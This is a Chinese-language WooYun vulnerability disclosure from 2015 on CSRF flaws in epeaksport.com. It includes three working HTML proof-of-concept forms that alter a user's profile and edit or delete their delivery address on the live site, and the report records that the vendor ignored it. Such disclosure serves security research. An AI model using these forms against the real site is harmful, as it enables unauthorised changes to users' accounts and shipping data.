当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0128938

漏洞标题:匹克多处CSRF漏洞

相关厂商:epeaksport.com

漏洞作者: 路人甲

提交时间:2015-07-24 16:04

修复时间:2015-07-29 16:06

公开时间:2015-07-29 16:06

漏洞类型:CSRF

危害等级:中

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-24: 细节已通知厂商并且等待厂商处理中
2015-07-29: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

匹克多处CSRF漏洞

详细说明:

http://www.epeaksport.com


个人资料处
POC

<html>
  <body>
    <form action="http://www.epeaksport.com/XP001-MemberDatum/saveData.html" method="POST">
      <input type="hidden" name="nickName" value="wooyun" />
      <input type="hidden" name="remark" value="wooyun" />
      <input type="hidden" name="theName" value="wooyun" />
      <input type="hidden" name="theSex" value="" />
      <input type="hidden" name="telephone" value="" />
      <input type="hidden" name="Birth" value="" />
      <input type="hidden" name="constellation" value="" />
      <input type="hidden" name="education" value="" />
      <input type="hidden" name="schoolName" value="" />
      <input type="hidden" name="companyName" value="" />
      <input type="hidden" name="jobProperty" value="0" />
      <input type="hidden" name="liveProvince" value="" />
      <input type="hidden" name="liveCity" value="" />
      <input type="hidden" name="liveCounty" value="" />
      <input type="hidden" name="liveAddress" value="" />
      <input type="hidden" name="livePostCode" value="" />
      <input type="hidden" name="credentialsState" value="" />
      <input type="hidden" name="credentialsNo" value="" />
      <input type="hidden" name="sportsState" value="0" />
      <input type="hidden" name="goodsProperty01" value="" />
      <input type="hidden" name="goodsProperty02" value="" />
      <input type="hidden" name="goodsProperty03" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


1.jpg

漏洞证明:

修改收货地址

<html>
  <body>
    <form action="http://www.epeaksport.com/XP001-Shopping-Order/saveAddress.html" method="POST">
      <input type="hidden" name="addressProvince" value="01&#46;14" />
      <input type="hidden" name="addressCity" value="01&#46;14&#46;01" />
      <input type="hidden" name="addressCounty" value="01&#46;14&#46;01&#46;01" />
      <input type="hidden" name="deliveryAddress" value="�#152;&#191;�#154;&#132;�#144;&#168;�#190;&#190;�#154;&#132;�#163;&#146;�#163;&#146;�#164;&#167;�#154;&#132;浜&#139;" />
      <input type="hidden" name="postCode" value="111111" />
      <input type="hidden" name="deliveryMan" value="�#152;&#191;�#137;&#147;�#174;&#151;�#137;&#147;" />
      <input type="hidden" name="Phone" value="" />
      <input type="hidden" name="MobilePhone" value="13333333331" />
      <input type="hidden" name="rowNo" value="0" />
      <input type="hidden" name="method" value="editSave" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


删除收货地址

<html>
  <body>
    <form action="http://www.epeaksport.com/XP001-Shopping-Order/delAddress.html" method="POST">
      <input type="hidden" name="rowNo" value="0" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
2.jpg

修复方案:

好痛苦

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-07-29 16:06

厂商回复:

漏洞Rank:2 (WooYun评价)

最新状态:

暂无

漏洞评价:

评论